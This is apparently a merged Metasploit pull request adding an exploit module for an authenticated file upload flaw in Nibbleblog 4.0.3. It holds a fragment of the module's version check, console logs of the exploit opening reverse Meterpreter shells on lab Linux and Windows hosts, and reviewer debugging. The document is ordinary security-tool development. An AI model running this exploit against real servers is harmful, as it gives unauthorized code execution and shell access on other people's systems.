### PR TITLE
Add Nibbleblog File Upload Vuln

### PR DESCRIPTION
**Pull request by espreto**
#### Add Nibbleblog File Upload Vulnerability.

  Application: Nibbleblog 4.0.3
  Homepage: http://www.nibbleblog.com
  Source Code: http://sourceforge.net/projects/nibbleblog/files/v4.0/nibbleblog-v4.0.3.zip
  References: http://blog.curesec.com/article/blog/NibbleBlog-403-Code-Execution-47.html

  Install:
      1. Download the Nibbleblog 4.0.3 version from source code above.
      2. Unzip the downloaded file.
      3. Upload all files to your hosting or local server via FTP, Shell, Cpanel, others.
      4. With your browser, go to the URL of your web. Example: www.domain-name.com.
      5. Complete the form.
      6. Done! You have installed Nibbleblog.
#### Vulnerable packages*

  4.0.3
##### Linux Ubuntu 12.04.5 LTS:

```
msfdevel 10.10.10.10 shell[s]:0 job[s]:0 msf>  use exploit/multi/http/nibbleblog_file_upload 
msfdevel 10.10.10.10 shell[s]:0 job[s]:0 msf> exploit(nibbleblog_file_upload)  set RHOST 10.10.10.20
RHOST => 10.10.10.20
msfdevel 10.10.10.10 shell[s]:0 job[s]:0 msf> exploit(nibbleblog_file_upload)  set USERNAME espreto
USERNAME => espreto
msfdevel 10.10.10.10 shell[s]:0 job[s]:0 msf> exploit(nibbleblog_file_upload)  set PASSWORD P@ssw0rd
PASSWORD => P@ssw0rd
msfdevel 10.10.10.10 shell[s]:0 job[s]:0 msf> exploit(nibbleblog_file_upload)  set TARGETURI /nibbleblog
TARGETURI => /nibbleblog
msfdevel 10.10.10.10 shell[s]:0 job[s]:0 msf> exploit(nibbleblog_file_upload)  check
[*] 10.10.10.20:80 - The target appears to be vulnerable.
msfdevel 10.10.10.10 shell[s]:0 job[s]:0 msf> exploit(nibbleblog_file_upload)  exploit 

[*] Started reverse handler on 10.10.10.10:4444 
[*] Sending stage (32976 bytes) to 10.10.10.20
[*] Meterpreter session 1 opened (10.10.10.10:4444 -> 10.10.10.20:49201) at 2015-09-09 20:45:03 -0300
[+] Deleted image.php

meterpreter > sysinfo 
Computer    : msfdevel
OS          : Linux msfdevel 3.13.0-62-generic #102~precise1-Ubuntu SMP Wed Aug 12 14:11:43 UTC 2015 i686
Meterpreter : php/php
meterpreter > shell
Process 8179 created.
Channel 0 created.

id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
^Z
```
##### Windows 7 Ultimate Edition SP1 x86:

```
msfdevel 10.10.10.10 shell[s]:0 job[s]:0 msf> exploit(nibbleblog_file_upload)  rexploit 
[*] Reloading module...

[*] Started reverse handler on 10.10.10.10:4444 
[*] Sending stage (32976 bytes) to 10.10.10.30
[*] Meterpreter session 4 opened (10.10.10.10:4444 -> 10.10.10.30:49255) at 2015-09-09 21:01:01 -0300
[+] Deleted image.php

meterpreter > sysinfo 
Computer    : WINBOX
OS          : Windows NT WINBOX 6.1 build 7601 (Windows 7 Ultimate Edition Service Pack 1) i586
Meterpreter : php/php
meterpreter > shell
Process 3440 created.
Channel 0 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\wamp\www\nibbleblog\content\private\plugins\my_image>
```

### CODE REVIEW

File: modules/exploits/multi/http/nibbleblog_file_upload.rb [hunk 1]
```diff
@@ -0,0 +1,143 @@
...
+      ], self.class)
+  end
+
+  def check
+    res = send_request_cgi(
+      'method'      => 'GET',
+      'uri'         => normalize_uri(target_uri.path, 'admin.php')
+    )
+
+    if res && res.code == 200 && res.body.include?('Sign in to Nibbleblog admin area')
```
Comment (void-in) [inline modules/exploits/multi/http/nibbleblog_file_upload.rb]: Is there any version string returned in the body that could be checked for 4.0.3? I think the above code will return Appears for all the versions of Nibbleblog.

Comment (espreto) [inline modules/exploits/multi/http/nibbleblog_file_upload.rb]: @void-in Done. :)

**Comment by wchen-r7** [comment]
@espreto I'm not getting this to work. I got this error while uploading the payload:

```
HTTP/1.1 200 OK
Date: Mon, 14 Sep 2015 20:55:33 GMT
Server: Apache/2.4.7 (Ubuntu)
X-Powered-By: PHP/5.5.9-1ubuntu4.11
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 171
Content-Type: text/html

<br />
<b>Fatal error</b>:  Call to a member function getChild() on a non-object in <b>/var/www/html/nibbleblog/admin/kernel/plugin.class.php</b> on line <b>105</b><br />
```

**Comment by espreto** [comment]
@wchen-r7 I could not reproduce the error (4.0.3 version) here. Redid the installation on Ubuntu and Windows 7 and both are working normally.
As uploading answer is expected warnings, but not a fatal error.

```
(nibbleblog_file_upload)  rexploit 
[*] Reloading module...

[*] Started reverse handler on 10.10.10.10:4444 
<br />
<b>Warning</b>:  imagesx() expects parameter 1 to be resource, boolean given in <b>/var/www/nibbleblog/admin/kernel/helpers/resize.class.php</b> on line <b>26</b><br />
<br />
<b>Warning</b>:  imagesy() expects parameter 1 to be resource, boolean given in <b>/var/www/nibbleblog/admin/kernel/helpers/resize.class.php</b> on line <b>27</b><br />
<br />
<b>Warning</b>:  imagecreatetruecolor(): Invalid image dimensions in <b>/var/www/nibbleblog/admin/kernel/helpers/resize.class.php</b> on line <b>117</b><br />

...snip...

</body>
</html>
[*] Sending stage (32976 bytes) to 10.10.10.20
[*] Meterpreter session 5 opened (10.10.10.10:4444 -> 10.10.10.20:42514) at 2015-09-15 11:16:11 -0300
[+] Deleted image.php

meterpreter > sysinfo 
Computer    : msfdevel
OS          : Linux msfdevel 3.13.0-62-generic #102~precise1-Ubuntu SMP Wed Aug 12 14:11:43 UTC 2015 i686
Meterpreter : php/php
meterpreter > pwd
/var/www/nibbleblog/content/private/plugins/my_image
meterpreter > 
```

Please try reinstalling the software again.

**Comment by espreto** [comment]
@wchen-r7 need more details? :v:

**Comment by wchen-r7** [comment]
I am trying again now.

**Comment by wchen-r7** [comment]
A little better now, but currently this is all I get:

screen shot 2015-10-16 at 1 48 10 pm

**Comment by wchen-r7** [comment]
Ok no, turns out it's the same error.

Ubuntu 14.04.3 + Apache2 + MySQL + PHP5 + php5-gd + nibbleblog-v4.0.3.zip. When the exploit uploads, I still get this response:

```
<br />
<b>Fatal error</b>:  Call to a member function getChild() on a non-object in <b>/var/www/html/nibbleblog/admin/kernel/plugin.class.php</b> on line <b>105</b><br />
```

**Comment by wchen-r7** [comment]
Oh finally I got it to work. I had to do something on the web app:

```
[*] Started reverse handler on 192.168.1.64:4444 
[*] 192.168.1.193:80 - Authenticating using admin:veryphat
[*] 192.168.1.193:80 - Logging in...
[+] 192.168.1.193:80 - Authenticated with Nibbleblog.
[*] 192.168.1.193:80 - Preparing payload...
[*] 192.168.1.193:80 - Uploading payload...
[+] 192.168.1.193:80 - Uploaded the payload.
[*] 192.168.1.193:80 - Parsed response.
[*] 192.168.1.193:80 - Executing the payload at /nibbleblog/content/private/plugins/my_image/image.php.
[*] Sending stage (32976 bytes) to 192.168.1.193
[*] Meterpreter session 1 opened (192.168.1.64:4444 -> 192.168.1.193:34112) at 2015-10-16 15:07:19 -0500
[+] Deleted image.php

meterpreter >
```

**Pull request merged**